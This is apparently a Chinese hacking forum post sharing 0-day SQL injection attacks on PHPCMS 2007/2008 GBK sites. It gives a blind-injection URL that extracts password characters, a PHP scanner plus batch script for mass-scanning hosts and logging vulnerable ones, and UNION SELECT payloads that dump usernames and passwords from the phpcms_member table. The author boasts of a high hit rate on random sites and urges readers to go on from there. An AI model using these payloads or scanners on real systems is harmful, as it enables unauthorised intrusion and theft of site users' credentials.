|
受影响程序: phpcms2008 gbk
漏洞文件:ask/search_ajax.php
code:
<?php
require './include/common.inc.php';
require_once MOD_ROOT.'include/ask.class.php';
$ask = new ask();
header('Content-type: text/html; charset=utf-8');
if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);
if($q)
{
$where = " title LIKE '%$q%' AND status = 5";
}
else
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);
foreach($infos as $key=>$val)
{
$val['title'] = str_replace($q, '<span class="c_orange">'.$q.'</span>', $val['title']);
$info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];
$info[$key]['url'] = $val['url'];
}
echo(json_encode($info));
?>
测试方法:
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
==================================
phpcms 2007 GBK版0day注射扫描脚本
作者:TheLostMind
本来比较忙,想整个站,发现这个0DAY还是很好的,写了个脚本自动扫描存在了漏洞的站点,至于说自动注射出帐号密码,还是不要了,不装X了。
网上看了下,貌似是零客网安0.S.T的“小蟑螂”大哥发现的~~
漏洞产生在member/member.php的第4行,代码如下:
..............
$m = $db->get_one("SELECT * FROM ".TABLE_MEMBER." m , ".TABLE_MEMBER_INFO." i WHERE m.userid=i.userid AND m.username='$username' ","CACHE",86400);
..............
username变量未经过过滤就进入查询了,我们在其包含的include/common.inc.php文件中有如下代码:
................
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
...............
呵呵,开始注射吧!由于变量有单引号“'”,所以我们要用一种方法去绕过这个限制,具体各位可以参考80sec的文章:
http://www.80sec.com/php-coder-class-security-alert.html
修改了下鬼仔的那个东西,直接那来用了,装X,哈哈……
=================scanbug.php==========================================
<?
if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
PHPcms SODB-2008-13 Exp
Usage: php '.$argv[0].' host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
die;
}
function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$prefix="phpcms_";
//$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{echo "Error... check the path!\r\n\r\n"; die;}
/*get $prefix*/
$packet ="GET ".$path."member/member.php?username=tlm%cf' HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
//$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
echo "\n\n正在测试站点: $host ……\n";
if (eregi("in your SQL syntax",$html))
{
$temp=explode("FROM ",$html);
if(isset($temp[1])){$temp2=explode(" ",$temp[1]);}
if ($temp2[0]){
$prefix=$temp2[0];
echo "数据库为: ".$prefix."\r\n";
echo "当前站点发现漏洞,请手工检测...\r\n";
}
$filename = "php0day.txt";
$handle = fopen ($filename,"a+");
if (!is_writable ($filename)){
die ("文件:".$filename."不可写,请检查其属性后重试!");
}
if (!fwrite ($handle,"\n存在漏洞的站点\t$host")){
die ("生成文件".$filename."失败!");
}
fwrite($handle,"\r\n");
fwrite($handle,"当前站点数据库\t");
fwrite($handle,$prefix);
fwrite($handle,"\r\n");
print_r('内容已经写入文件!');
fclose ($handle); //关闭指针
}
else
exit("没漏洞哦……\n");
?>
===================================END==========================================
脚本文件就更简单了:
===================================scan.bat=======================================
@echo off
title PHPcms PHPcms 0DAY自动注射程序工作中……
FOR /F "eol=; tokens=1,2,3* delims=, " %%i in (php.txt) do D:\PHPnow-1.4.5-20\php-5.2.6-
Win32\php.exe 0dayhpcms.php %%i /
pause
====================================end==========================================
貌似存在这个漏洞的站点很多啊,随便扫了一下,命中率相当高,呵呵~
至于查询密码,就用NUNION吧,网上找了个工具抓了下包,貌似是不同版本的字段数不一样
==============================================
/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,
33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,username,password,57,58,59,60,61,62,
63,64,65/**/from/**/phpcms_member/**/where/**/userid=1
/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,
32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,username,password,57,58,59,60,
61,62/**/from/**/phpcms_member/**/where/**/userid=1/*
/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,username,password,52,53,54,55,56,
57/**/from/**/phpcms_member/**/where/**/userid=1/*
/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,
29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,username,password,
53,54,55,56,57,58/**/from/**/phpcms_member/**/where/**/userid=1/*
=======================================
替换其中的数据库名就可以了,数据库名已经扫描出来了,有利用工具,自己发挥吧……
|
推荐
评论(0条)
